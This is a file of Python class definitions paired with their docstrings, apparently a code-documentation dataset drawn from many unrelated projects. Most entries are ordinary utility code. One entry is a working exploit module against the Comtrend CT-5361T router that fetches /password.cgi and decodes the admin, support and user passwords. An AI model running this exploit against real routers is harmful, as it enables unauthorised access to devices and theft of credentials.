class TransitionAction(object): <NEW_LINE> <INDENT> __slots__ = ("door_id", "_command_list") <NEW_LINE> def __init__(self, InitCommandList=None): <NEW_LINE> <INDENT> assert InitCommandList is None or isinstance(InitCommandList, CommandList), "%s: %s" % (InitCommandList.__class__, InitCommandList) <NEW_LINE> self.door_id = None <NEW_LINE> if InitCommandList is None: self._command_list = CommandList() <NEW_LINE> else: self._command_list = InitCommandList <NEW_LINE> <DEDENT> @property <NEW_LINE> def command_list(self): <NEW_LINE> <INDENT> return self._command_list <NEW_LINE> <DEDENT> @command_list.setter <NEW_LINE> def command_list(self, CL): <NEW_LINE> <INDENT> assert isinstance(CL, CommandList) or CL is None <NEW_LINE> self._command_list = CL <NEW_LINE> <DEDENT> def clone(self): <NEW_LINE> <INDENT> result = TransitionAction(self._command_list.clone()) <NEW_LINE> result.door_id = self.door_id <NEW_LINE> return result <NEW_LINE> <DEDENT> def __hash__(self): <NEW_LINE> <INDENT> return hash(self._command_list) <NEW_LINE> <DEDENT> def __eq__(self, Other): <NEW_LINE> <INDENT> return self._command_list == Other._command_list <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return "(%s: [%s])" % (self.door_id, self._command_list) | Object containing information about commands to be executed upon
transition into a state.
.command_list --> list of commands to be executed upon the transition.
.door_id --> An 'id' which is supposed to be unique for a command list.
It is (re-)assigned during the process of
'EntryActionDB.categorize()'. | 62599087e1aae11d1e7cf5d9 |
class DoubleGaussianNLL(BaseGaussianNLL): <NEW_LINE> <INDENT> posterior_name = 'DoubleGaussianBNNPosterior' <NEW_LINE> def __init__(self, Y_dim): <NEW_LINE> <INDENT> super(DoubleGaussianNLL, self).__init__(Y_dim) <NEW_LINE> self.tril_idx = torch.tril_indices(self.Y_dim, self.Y_dim, offset=0) <NEW_LINE> self.tril_len = len(self.tril_idx[0]) <NEW_LINE> self.out_dim = self.Y_dim**2 + 3*self.Y_dim + 1 <NEW_LINE> <DEDENT> def __call__(self, pred, target): <NEW_LINE> <INDENT> return self.nll_mixture(target, *self.slice(pred), reduce=False) <NEW_LINE> <DEDENT> def slice(self, pred): <NEW_LINE> <INDENT> d = self.Y_dim <NEW_LINE> return torch.split(pred, [d, self.tril_len, d, self.tril_len, 1], dim=1) <NEW_LINE> <DEDENT> def set_trained_pred(self, pred): <NEW_LINE> <INDENT> d = self.Y_dim <NEW_LINE> self.batch_size = pred.shape[0] <NEW_LINE> self.mu = pred[:, :d] <NEW_LINE> self.tril_elements = pred[:, d:d+self.tril_len] <NEW_LINE> self.mu2 = pred[:, d+self.tril_len:2*d+self.tril_len] <NEW_LINE> self.tril_elements2 = pred[:, 2*d+self.tril_len:-1] <NEW_LINE> self.w2 = 0.5*self.sigmoid(pred[:, -1].reshape(-1, 1)) <NEW_LINE> <DEDENT> def sample(self, mean, std, n_samples): <NEW_LINE> <INDENT> self.Y_mean = mean <NEW_LINE> self.Y_std = std <NEW_LINE> samples = torch.zeros([self.batch_size, n_samples, self.Y_dim]).to(mean.device) <NEW_LINE> unif2 = torch.rand(self.batch_size, n_samples).to(mean.device) <NEW_LINE> second_gaussian = (self.w2 > unif2) <NEW_LINE> samples2 = self.sample_full_rank(n_samples, self.mu2, self.tril_elements2, as_numpy=False) <NEW_LINE> samples[second_gaussian, :] = samples2[second_gaussian, :] <NEW_LINE> samples1 = self.sample_full_rank(n_samples, self.mu, self.tril_elements, as_numpy=False) <NEW_LINE> samples[~second_gaussian, :] = samples1[~second_gaussian, :] <NEW_LINE> samples = samples.data.cpu().numpy() <NEW_LINE> return samples | The negative log likelihood (NLL) for a mixture of two Gaussians, each
with a full covariance constrained to be low-rank plus diagonal.
Only rank 2 is currently supported. See the `BaseGaussianNLL.__init__` docstring
for the parameter description. | 625990873317a56b869bf30a |
class Solution: <NEW_LINE> <INDENT> def verticalOrder(self, root): <NEW_LINE> <INDENT> vPosToVals = defaultdict(list) <NEW_LINE> leftMost = 0 <NEW_LINE> rightMost = -1 <NEW_LINE> queue = deque() <NEW_LINE> if root: <NEW_LINE> <INDENT> queue.append( (root,0) ) <NEW_LINE> leftMost = 0 <NEW_LINE> rightMost = 0 <NEW_LINE> <DEDENT> while queue: <NEW_LINE> <INDENT> node, vPos = queue.popleft() <NEW_LINE> vPosToVals[vPos].append( node.val ) <NEW_LINE> if node.left: <NEW_LINE> <INDENT> queue.append( (node.left, vPos-1) ) <NEW_LINE> leftMost = min(leftMost, vPos-1) <NEW_LINE> <DEDENT> if node.right: <NEW_LINE> <INDENT> queue.append( (node.right, vPos+1) ) <NEW_LINE> rightMost = max(rightMost, vPos+1) <NEW_LINE> <DEDENT> <DEDENT> ret = [] <NEW_LINE> for pos in range(leftMost, rightMost+1): <NEW_LINE> <INDENT> ret.append( vPosToVals[pos] ) <NEW_LINE> <DEDENT> return ret | @param root: the root of tree
@return: the vertical order traversal | 62599087283ffb24f3cf542d |
class RedisSet(PassThroughSerializer): <NEW_LINE> <INDENT> def __init__(self, set_key, redis_client=redis_config.CLIENT): <NEW_LINE> <INDENT> self._client = redis_client or redis_pipe.RedisPipe() <NEW_LINE> self.set_key = set_key <NEW_LINE> <DEDENT> def __len__(self): <NEW_LINE> <INDENT> return self._client.scard(self.set_key) <NEW_LINE> <DEDENT> def __iter__(self): <NEW_LINE> <INDENT> for item in self._client.sscan_iter(self.set_key): <NEW_LINE> <INDENT> yield self.deserialize(item) <NEW_LINE> <DEDENT> <DEDENT> def delete_all(self): <NEW_LINE> <INDENT> self._client.delete(self.set_key) <NEW_LINE> <DEDENT> def add(self, val): <NEW_LINE> <INDENT> val = self.serialize(val) <NEW_LINE> self._client.sadd(self.set_key, val) <NEW_LINE> <DEDENT> def update(self, vals): <NEW_LINE> <INDENT> vals = [self.serialize(x) for x in vals] <NEW_LINE> self._client.sadd(self.set_key, *vals) <NEW_LINE> <DEDENT> def __contains__(self, val): <NEW_LINE> <INDENT> return self._client.sismember(self.set_key, self.serialize(val)) <NEW_LINE> <DEDENT> def pop(self): <NEW_LINE> <INDENT> return self.deserialize(self._client.spop(self.set_key)) <NEW_LINE> <DEDENT> def remove(self, val): <NEW_LINE> <INDENT> self._client.srem(self.set_key, self.serialize(val)) <NEW_LINE> <DEDENT> def __unicode__(self): <NEW_LINE> <INDENT> objs = self._client.smembers(self.set_key) <NEW_LINE> objs = [self.deserialize(x) for x in objs] <NEW_LINE> return u"RedisSet(%s)" % (objs,) <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return self.__unicode__() | An object which behaves like a Python set, but which is based by Redis. | 625990874527f215b58eb766 |
class ConfFixture(config_fixture.Config): <NEW_LINE> <INDENT> def setUp(self): <NEW_LINE> <INDENT> super(ConfFixture, self).setUp() <NEW_LINE> self.conf.set_default('compute_driver', 'fake.SmallFakeDriver') <NEW_LINE> self.conf.set_default('fake_network', True) <NEW_LINE> self.conf.set_default('flat_network_bridge', 'br100') <NEW_LINE> self.conf.set_default('floating_ip_dns_manager', 'nova.tests.unit.utils.dns_manager') <NEW_LINE> self.conf.set_default('force_dhcp_release', False) <NEW_LINE> self.conf.set_default('host', 'fake-mini') <NEW_LINE> self.conf.set_default('instance_dns_manager', 'nova.tests.unit.utils.dns_manager') <NEW_LINE> self.conf.set_default('network_size', 8) <NEW_LINE> self.conf.set_default('num_networks', 2) <NEW_LINE> self.conf.set_default('periodic_enable', False) <NEW_LINE> self.conf.set_default('project_id_regex', '[0-9a-fk\-]+', 'osapi_v21') <NEW_LINE> self.conf.set_default('use_ipv6', True) <NEW_LINE> self.conf.set_default('vlan_interface', 'eth0') <NEW_LINE> self.conf.set_default('auth_strategy', 'noauth2', group='api') <NEW_LINE> self.conf.set_default('connection', "sqlite://", group='api_database') <NEW_LINE> self.conf.set_default('sqlite_synchronous', False, group='api_database') <NEW_LINE> self.conf.set_default('connection', "sqlite://", group='database') <NEW_LINE> self.conf.set_default('sqlite_synchronous', False, group='database') <NEW_LINE> self.conf.set_default('backend', 'nova.keymgr.conf_key_mgr.ConfKeyManager', group='key_manager') <NEW_LINE> self.conf.set_default('api_paste_config', paths.state_path_def('etc/nova/api-paste.ini'), group='wsgi') <NEW_LINE> self.conf.set_default('keep_alive', False, group="wsgi") <NEW_LINE> self.conf.set_default('region_name', 'RegionOne', group='placement') <NEW_LINE> config.parse_args([], default_config_files=[], configure_db=False, init_rpc=False) <NEW_LINE> policy_opts.set_defaults(self.conf) <NEW_LINE> self.addCleanup(utils.cleanup_dns_managers) <NEW_LINE> self.addCleanup(ipv6.api.reset_backend) | Fixture to manage global conf settings. | 62599087adb09d7d5dc0c0e7 |
class GoogleCommand( CommandObject ): <NEW_LINE> <INDENT> def __init__( self, parameter = None ): <NEW_LINE> <INDENT> CommandObject.__init__( self ) <NEW_LINE> self.parameter = parameter <NEW_LINE> if parameter != None: <NEW_LINE> <INDENT> self.setDescription( u"Performs a Google web search for " u"\u201c%s\u201d." % parameter ) <NEW_LINE> <DEDENT> <DEDENT> def run( self ): <NEW_LINE> <INDENT> MAX_QUERY_LENGTH = 2048 <NEW_LINE> if self.parameter != None: <NEW_LINE> <INDENT> text = self.parameter.decode() <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> seldict = selection.get() <NEW_LINE> text = seldict.get( "text", u"" ) <NEW_LINE> <DEDENT> text = text.strip() <NEW_LINE> if not text: <NEW_LINE> <INDENT> displayMessage( "<p>No text was selected.</p>" ) <NEW_LINE> return <NEW_LINE> <DEDENT> BASE_URL = "http://www.google.com/search?hl=%s&q=%s" <NEW_LINE> languageCode, encoding = locale.getdefaultlocale() <NEW_LINE> if languageCode: <NEW_LINE> <INDENT> language = languageCode.split( "_" )[0] <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> language = "en" <NEW_LINE> <DEDENT> text = urllib.quote_plus( text.encode("utf-8") ) <NEW_LINE> finalQuery = BASE_URL % ( language, text ) <NEW_LINE> if len( finalQuery ) > MAX_QUERY_LENGTH: <NEW_LINE> <INDENT> displayMessage( "<p>Your query is too long.</p>" ) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> webbrowser.open_new_tab( finalQuery ) <NEW_LINE> <DEDENT> except: <NEW_LINE> <INDENT> pass | Implementation of the 'google' command. | 62599087bf627c535bcb3061 |
class Exploit(exploits.Exploit): <NEW_LINE> <INDENT> __info__ = { 'name': 'Comtrend CT 5361T Password Disclosure', 'description': 'WiFi router Comtrend CT 5361T suffers from a Password Disclosure Vulnerability', 'authors': [ 'TUNISIAN CYBER', ], 'references': [ 'https://packetstormsecurity.com/files/126129/Comtrend-CT-5361T-Password-Disclosure.html' ], 'devices': [ 'Comtrend CT 5361T (more likely CT 536X)', ] } <NEW_LINE> target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) <NEW_LINE> port = exploits.Option(80, 'Target port') <NEW_LINE> def run(self): <NEW_LINE> <INDENT> if self.check(): <NEW_LINE> <INDENT> url = "{}:{}/password.cgi".format(self.target, self.port) <NEW_LINE> print_status("Requesting for {}".format(url)) <NEW_LINE> response = http_request(method="GET", url=url) <NEW_LINE> if response is None: <NEW_LINE> <INDENT> return <NEW_LINE> <DEDENT> regexps = [("admin", "pwdAdmin = '(.+?)'"), ("support", "pwdSupport = '(.+?)'"), ("user", "pwdUser = '(.+?)'")] <NEW_LINE> creds = [] <NEW_LINE> for regexp in regexps: <NEW_LINE> <INDENT> res = re.findall(regexp[1], response.text) <NEW_LINE> if len(res): <NEW_LINE> <INDENT> creds.append((regexp[0], b64decode(res[0]))) <NEW_LINE> <DEDENT> <DEDENT> if len(creds): <NEW_LINE> <INDENT> print_success("Credentials found!") <NEW_LINE> headers = ("Login", "Password") <NEW_LINE> print_table(headers, *creds) <NEW_LINE> print_info("NOTE: Admin is commonly implemented as root") <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> print_error("Credentials could not be found") <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> print_error("Device seems to be not vulnerable") <NEW_LINE> <DEDENT> <DEDENT> @mute <NEW_LINE> def check(self): <NEW_LINE> <INDENT> url = "{}:{}/password.cgi".format(self.target, self.port) <NEW_LINE> response = http_request(method="GET", url=url) <NEW_LINE> if response is None: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> regexps = ["pwdAdmin = '(.+?)'", "pwdSupport = '(.+?)'", "pwdUser = '(.+?)'"] <NEW_LINE> for regexp in regexps: <NEW_LINE> <INDENT> res = re.findall(regexp, response.text) <NEW_LINE> if len(res): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> b64decode(res[0]) <NEW_LINE> <DEDENT> except: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> <DEDENT> return True | Exploit implementation for Comtrend CT-5361T Password Disclosure vulnerability.
If the target is vulnerable, it allows reading credentials for admin, support and user. | 625990873617ad0b5ee07cdf |
class KickStarter(DB.Model): <NEW_LINE> <INDENT> id = DB.Column(DB.BigInteger, primary_key=True) <NEW_LINE> name = DB.Column(DB.String, nullable=False) <NEW_LINE> usd_goal = DB.Column(DB.Float, nullable=False) <NEW_LINE> country = DB.Column(DB.String, nullable=False) <NEW_LINE> def __repr__(self): <NEW_LINE> <INDENT> return "<Kickstarter name: {}, USD-GOAL: {}, Country: {}>".format(self.name, self.usd_goal, self.country) | Twitter Users that correspond to tweets | 62599087167d2b6e312b835e |
class BaseTestCase(TestCase): <NEW_LINE> <INDENT> def create_app(self): <NEW_LINE> <INDENT> app.config.from_object('server.config.TestingConfig') <NEW_LINE> return app | Base Tests | 6259908744b2445a339b7723 |
class get_all_tables_result: <NEW_LINE> <INDENT> thrift_spec = ( (0, TType.LIST, 'success', (TType.STRING,None), None, ), (1, TType.STRUCT, 'o1', (MetaException, MetaException.thrift_spec), None, ), ) <NEW_LINE> def __init__(self, success=None, o1=None,): <NEW_LINE> <INDENT> self.success = success <NEW_LINE> self.o1 = o1 <NEW_LINE> <DEDENT> def read(self, iprot): <NEW_LINE> <INDENT> if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: <NEW_LINE> <INDENT> fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) <NEW_LINE> return <NEW_LINE> <DEDENT> iprot.readStructBegin() <NEW_LINE> while True: <NEW_LINE> <INDENT> (fname, ftype, fid) = iprot.readFieldBegin() <NEW_LINE> if ftype == TType.STOP: <NEW_LINE> <INDENT> break <NEW_LINE> <DEDENT> if fid == 0: <NEW_LINE> <INDENT> if ftype == TType.LIST: <NEW_LINE> <INDENT> self.success = [] <NEW_LINE> (_etype495, _size492) = iprot.readListBegin() <NEW_LINE> for _i496 in xrange(_size492): <NEW_LINE> <INDENT> _elem497 = iprot.readString(); <NEW_LINE> self.success.append(_elem497) <NEW_LINE> <DEDENT> iprot.readListEnd() <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> iprot.skip(ftype) <NEW_LINE> <DEDENT> <DEDENT> elif fid == 1: <NEW_LINE> <INDENT> if ftype == TType.STRUCT: <NEW_LINE> <INDENT> self.o1 = MetaException() <NEW_LINE> self.o1.read(iprot) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> iprot.skip(ftype) <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> iprot.skip(ftype) <NEW_LINE> <DEDENT> iprot.readFieldEnd() <NEW_LINE> <DEDENT> iprot.readStructEnd() <NEW_LINE> <DEDENT> def write(self, oprot): <NEW_LINE> <INDENT> if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: <NEW_LINE> <INDENT> oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) <NEW_LINE> return <NEW_LINE> <DEDENT> oprot.writeStructBegin('get_all_tables_result') <NEW_LINE> if self.success is not None: <NEW_LINE> <INDENT> oprot.writeFieldBegin('success', TType.LIST, 0) <NEW_LINE> oprot.writeListBegin(TType.STRING, len(self.success)) <NEW_LINE> for iter498 in self.success: <NEW_LINE> <INDENT> oprot.writeString(iter498) <NEW_LINE> <DEDENT> oprot.writeListEnd() <NEW_LINE> oprot.writeFieldEnd() <NEW_LINE> <DEDENT> if self.o1 is not None: <NEW_LINE> <INDENT> oprot.writeFieldBegin('o1', TType.STRUCT, 1) <NEW_LINE> self.o1.write(oprot) <NEW_LINE> oprot.writeFieldEnd() <NEW_LINE> <DEDENT> oprot.writeFieldStop() <NEW_LINE> oprot.writeStructEnd() <NEW_LINE> <DEDENT> def validate(self): <NEW_LINE> <INDENT> return <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] <NEW_LINE> return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) <NEW_LINE> <DEDENT> def __eq__(self, other): <NEW_LINE> <INDENT> return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ <NEW_LINE> <DEDENT> def __ne__(self, other): <NEW_LINE> <INDENT> return not (self == other) | Attributes:
- success
- o1 | 62599087dc8b845886d55148 |
class Turbidity(object): <NEW_LINE> <INDENT> def __init__(self): <NEW_LINE> <INDENT> self._adc = ADC(Pin.board.X6) <NEW_LINE> <DEDENT> def get(self): <NEW_LINE> <INDENT> volts = ((self._adc.read()/ adc_range) * in_voltage) <NEW_LINE> return volts <NEW_LINE> <DEDENT> def NTU(self): <NEW_LINE> <INDENT> volts = self.get() <NEW_LINE> if volts <= 2.5: <NEW_LINE> <INDENT> return 3000 <NEW_LINE> <DEDENT> return (-1120.4 * (volts**2)) + (5742.3 * volts) - 4352.9 | Turbidity meter | 6259908760cbc95b06365b33 |
class UnverifiedEmailError(QiitaError): <NEW_LINE> <INDENT> pass | Email has not been validated | 62599087283ffb24f3cf542f |
class Place(RealmBaseModel, ModelWithDiscussions): <NEW_LINE> <INDENT> TYPE_COUNTRY = 'country' <NEW_LINE> TYPE_LOCALITY = 'locality' <NEW_LINE> TYPE_HOUSE = 'house' <NEW_LINE> TYPES = ( (TYPE_COUNTRY, 'Страна'), (TYPE_LOCALITY, 'Местность'), (TYPE_HOUSE, 'Здание'), ) <NEW_LINE> title = models.CharField('Название', max_length=255) <NEW_LINE> description = models.TextField('Описание', blank=True, null=False, default='') <NEW_LINE> geo_title = models.TextField('Полное название', null=True, blank=True, unique=True) <NEW_LINE> geo_bounds = models.CharField('Пределы', max_length=255, null=True, blank=True) <NEW_LINE> geo_pos = models.CharField('Координаты', max_length=255, null=True, blank=True) <NEW_LINE> geo_type = models.CharField('Тип', max_length=25, null=True, blank=True, choices=TYPES, db_index=True) <NEW_LINE> history = HistoricalRecords() <NEW_LINE> class Meta: <NEW_LINE> <INDENT> verbose_name = 'Место' <NEW_LINE> verbose_name_plural = 'Места' <NEW_LINE> <DEDENT> def get_pos(self): <NEW_LINE> <INDENT> lat, lng = self.geo_pos.split('|') <NEW_LINE> return lat, lng <NEW_LINE> <DEDENT> @classmethod <NEW_LINE> def create_place_from_name(cls, name): <NEW_LINE> <INDENT> from .utils import get_location_data <NEW_LINE> loc_data = get_location_data(name) <NEW_LINE> if loc_data is None: <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> full_title = loc_data['name'] <NEW_LINE> place = cls( title=loc_data['requested_name'], geo_title=full_title, geo_bounds=loc_data['bounds'], geo_pos=loc_data['pos'], geo_type=loc_data['type'] ) <NEW_LINE> try: <NEW_LINE> <INDENT> place.save() <NEW_LINE> <DEDENT> except IntegrityError: <NEW_LINE> <INDENT> place = cls.objects.get(geo_title=full_title) <NEW_LINE> <DEDENT> return place <NEW_LINE> <DEDENT> def __unicode__(self): <NEW_LINE> <INDENT> return self.geo_title | Географическое место. Для людей, событий и пр. | 62599087099cdd3c636761c2 |
class DeviceDetails(msrest.serialization.Model): <NEW_LINE> <INDENT> _validation = { 'serial_number': {'readonly': True}, 'management_resource_id': {'readonly': True}, 'management_resource_tenant_id': {'readonly': True}, } <NEW_LINE> _attribute_map = { 'serial_number': {'key': 'serialNumber', 'type': 'str'}, 'management_resource_id': {'key': 'managementResourceId', 'type': 'str'}, 'management_resource_tenant_id': {'key': 'managementResourceTenantId', 'type': 'str'}, } <NEW_LINE> def __init__( self, **kwargs ): <NEW_LINE> <INDENT> super(DeviceDetails, self).__init__(**kwargs) <NEW_LINE> self.serial_number = None <NEW_LINE> self.management_resource_id = None <NEW_LINE> self.management_resource_tenant_id = None | Device details.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar serial_number: device serial number.
:vartype serial_number: str
:ivar management_resource_id: Management Resource Id.
:vartype management_resource_id: str
:ivar management_resource_tenant_id: Management Resource Tenant ID.
:vartype management_resource_tenant_id: str | 6259908792d797404e389924 |
class GcfHook(GoogleCloudBaseHook): <NEW_LINE> <INDENT> _conn = None <NEW_LINE> def __init__(self, api_version, gcp_conn_id='google_cloud_default', delegate_to=None): <NEW_LINE> <INDENT> super(GcfHook, self).__init__(gcp_conn_id, delegate_to) <NEW_LINE> self.api_version = api_version <NEW_LINE> <DEDENT> def get_conn(self): <NEW_LINE> <INDENT> if not self._conn: <NEW_LINE> <INDENT> http_authorized = self._authorize() <NEW_LINE> self._conn = build('cloudfunctions', self.api_version, http=http_authorized, cache_discovery=False) <NEW_LINE> <DEDENT> return self._conn <NEW_LINE> <DEDENT> def get_function(self, name): <NEW_LINE> <INDENT> return self.get_conn().projects().locations().functions().get( name=name).execute(num_retries=NUM_RETRIES) <NEW_LINE> <DEDENT> def list_functions(self, full_location): <NEW_LINE> <INDENT> list_response = self.get_conn().projects().locations().functions().list( parent=full_location).execute(num_retries=NUM_RETRIES) <NEW_LINE> return list_response.get("functions", []) <NEW_LINE> <DEDENT> def create_new_function(self, full_location, body): <NEW_LINE> <INDENT> response = self.get_conn().projects().locations().functions().create( location=full_location, body=body ).execute(num_retries=NUM_RETRIES) <NEW_LINE> operation_name = response["name"] <NEW_LINE> return self._wait_for_operation_to_complete(operation_name) <NEW_LINE> <DEDENT> def update_function(self, name, body, update_mask): <NEW_LINE> <INDENT> response = self.get_conn().projects().locations().functions().patch( updateMask=",".join(update_mask), name=name, body=body ).execute(num_retries=NUM_RETRIES) <NEW_LINE> operation_name = response["name"] <NEW_LINE> return self._wait_for_operation_to_complete(operation_name) <NEW_LINE> <DEDENT> def upload_function_zip(self, parent, zip_path): <NEW_LINE> <INDENT> response = self.get_conn().projects().locations().functions().generateUploadUrl( parent=parent ).execute(num_retries=NUM_RETRIES) <NEW_LINE> upload_url = response.get('uploadUrl') <NEW_LINE> with open(zip_path, 'rb') as fp: <NEW_LINE> <INDENT> requests.put( url=upload_url, data=fp.read(), headers={ 'Content-type': 'application/zip', 'x-goog-content-length-range': '0,104857600', } ) <NEW_LINE> <DEDENT> return upload_url <NEW_LINE> <DEDENT> def delete_function(self, name): <NEW_LINE> <INDENT> response = self.get_conn().projects().locations().functions().delete( name=name).execute(num_retries=NUM_RETRIES) <NEW_LINE> operation_name = response["name"] <NEW_LINE> return self._wait_for_operation_to_complete(operation_name) <NEW_LINE> <DEDENT> def _wait_for_operation_to_complete(self, operation_name): <NEW_LINE> <INDENT> service = self.get_conn() <NEW_LINE> while True: <NEW_LINE> <INDENT> operation_response = service.operations().get( name=operation_name, ).execute(num_retries=NUM_RETRIES) <NEW_LINE> if operation_response.get("done"): <NEW_LINE> <INDENT> response = operation_response.get("response") <NEW_LINE> error = operation_response.get("error") <NEW_LINE> if error: <NEW_LINE> <INDENT> raise AirflowException(str(error)) <NEW_LINE> <DEDENT> return response <NEW_LINE> <DEDENT> time.sleep(TIME_TO_SLEEP_IN_SECONDS) | Hook for the Google Cloud Functions APIs. | 62599087d486a94d0ba2db46 |
class LibpcapProvider(InterfaceProvider): <NEW_LINE> <INDENT> name = "libpcap" <NEW_LINE> libpcap = True <NEW_LINE> def load(self): <NEW_LINE> <INDENT> if not conf.use_pcap or WINDOWS: <NEW_LINE> <INDENT> return {} <NEW_LINE> <DEDENT> if not conf.cache_pcapiflist: <NEW_LINE> <INDENT> load_winpcapy() <NEW_LINE> <DEDENT> data = {} <NEW_LINE> i = 0 <NEW_LINE> for ifname, dat in conf.cache_pcapiflist.items(): <NEW_LINE> <INDENT> description, ips, flags, mac = dat <NEW_LINE> i += 1 <NEW_LINE> if not mac: <NEW_LINE> <INDENT> from scapy.arch import get_if_hwaddr <NEW_LINE> try: <NEW_LINE> <INDENT> mac = get_if_hwaddr(ifname) <NEW_LINE> <DEDENT> except Exception: <NEW_LINE> <INDENT> continue <NEW_LINE> <DEDENT> <DEDENT> if_data = { 'name': ifname, 'description': description or ifname, 'network_name': ifname, 'index': i, 'mac': mac or '00:00:00:00:00:00', 'ips': ips, 'flags': flags } <NEW_LINE> data[ifname] = NetworkInterface(self, if_data) <NEW_LINE> <DEDENT> return data <NEW_LINE> <DEDENT> def reload(self): <NEW_LINE> <INDENT> if conf.use_pcap: <NEW_LINE> <INDENT> from scapy.arch.libpcap import load_winpcapy <NEW_LINE> load_winpcapy() <NEW_LINE> <DEDENT> return self.load() | Load interfaces from Libpcap on non-Windows machines | 625990874a966d76dd5f0a76 |
class RemuneracionNomenclador(RemuneracionPorcentual): <NEW_LINE> <INDENT> cargo = models.ForeignKey('Cargo', help_text=u'Remuneración porcentual inherente a un cargo en particular.') | A percentage-based nomenclator remuneration tied to a particular position. | 6259908763b5f9789fe86cfa |
class NotFilter(AbstractFilter): <NEW_LINE> <INDENT> def __init__(self): <NEW_LINE> <INDENT> AbstractFilter.__init__(self, "NotFilter") <NEW_LINE> <DEDENT> def add_child(self, mo): <NEW_LINE> <INDENT> self._child.append(mo) <NEW_LINE> <DEDENT> def write_xml(self, xml_doc=None, option=None, element_name=None): <NEW_LINE> <INDENT> if xml_doc is None: <NEW_LINE> <INDENT> xml_obj=Element("not") <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> if element_name == None: <NEW_LINE> <INDENT> xml_obj = SubElement(xml_doc,"not") <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> xml_obj = SubElement(xml_doc, element_name) <NEW_LINE> <DEDENT> <DEDENT> self.child_write_xml(xml_obj, option) <NEW_LINE> return xml_obj <NEW_LINE> <DEDENT> def set_attr(self, key, value): <NEW_LINE> <INDENT> self.__dict__[key] = value <NEW_LINE> <DEDENT> def get_attr(self, key): <NEW_LINE> <INDENT> return self.__dict__[key] <NEW_LINE> <DEDENT> def load_from_xml(self, element, handle): <NEW_LINE> <INDENT> self.set_handle(handle) <NEW_LINE> if element.attrib: <NEW_LINE> <INDENT> for attr_name, attr_value in element.attrib.iteritems(): <NEW_LINE> <INDENT> self.setattr(ImcUtils.word_u(attr_name), str(attr_value)) <NEW_LINE> <DEDENT> <DEDENT> child_elements = element.getchildren() <NEW_LINE> if child_elements: <NEW_LINE> <INDENT> for child_element in child_elements: <NEW_LINE> <INDENT> if not ET.iselement(child_element): <NEW_LINE> <INDENT> continue <NEW_LINE> <DEDENT> child_field_names = [ "abstractFilter", "allbits", "and", "anybit", "bw", "eq", "ge", "gt", "le", "lt", "ne", "not", "or", "wcard", ] <NEW_LINE> cln = ImcUtils.word_u(child_element.tag) <NEW_LINE> child = class_factory(cln) <NEW_LINE> self._child.append(child) <NEW_LINE> child.load_from_xml(child_element, handle) | NotFilter Class. | 625990877b180e01f3e49e2d |
class Trace: <NEW_LINE> <INDENT> def __init__(self, board, time_limits): <NEW_LINE> <INDENT> self.time_limits = [t for t in time_limits] <NEW_LINE> self.initial_board = board.clone() <NEW_LINE> self.actions = [] <NEW_LINE> self.winner = 0 <NEW_LINE> self.reason = "" <NEW_LINE> <DEDENT> def add_action(self, player, action, t): <NEW_LINE> <INDENT> self.actions.append((player, action, t)) <NEW_LINE> <DEDENT> def set_winner(self, winner, reason): <NEW_LINE> <INDENT> self.winner = winner <NEW_LINE> self.reason = reason <NEW_LINE> <DEDENT> def get_initial_board(self): <NEW_LINE> <INDENT> return Board(self.initial_board) <NEW_LINE> <DEDENT> def write(self, f): <NEW_LINE> <INDENT> pickle.dump(self, f) | Keep track of a played game.
Attributes:
time_limits -- a sequence of 2 elements containing the time limits in
seconds for each agent, or None for a time-unlimited agent
initial_board -- the initial board
actions -- list of tuples (player, action, time) for each played action.
Respectively, the player number, the action and the time taken in
seconds.
winner -- winner of the game
reason -- specific reason for victory or "" if standard | 62599087091ae356687067d3 |
class CurrencyField(DecimalField): <NEW_LINE> <INDENT> def __init__(self, **kwargs): <NEW_LINE> <INDENT> if 'max_digits' in kwargs.keys(): <NEW_LINE> <INDENT> del kwargs['max_digits'] <NEW_LINE> <DEDENT> if 'decimal_places' in kwargs.keys(): <NEW_LINE> <INDENT> del kwargs['decimal_places'] <NEW_LINE> <DEDENT> default = kwargs.get('default', Decimal('0.00')) <NEW_LINE> if 'default' in kwargs.keys(): <NEW_LINE> <INDENT> del kwargs['default'] <NEW_LINE> <DEDENT> return super(CurrencyField,self).__init__(max_digits=12,decimal_places=2,default=default,**kwargs) <NEW_LINE> <DEDENT> def south_field_triple(self): <NEW_LINE> <INDENT> from south.modelsinspector import introspector <NEW_LINE> field_class = "django.db.models.fields.DecimalField" <NEW_LINE> args, kwargs = introspector(self) <NEW_LINE> return (field_class, args, kwargs) | A CurrencyField is simply a subclass of DecimalField with a fixed format:
max_digits = 12, decimal_places=2, and defaults to 0.00 | 6259908792d797404e389925 |
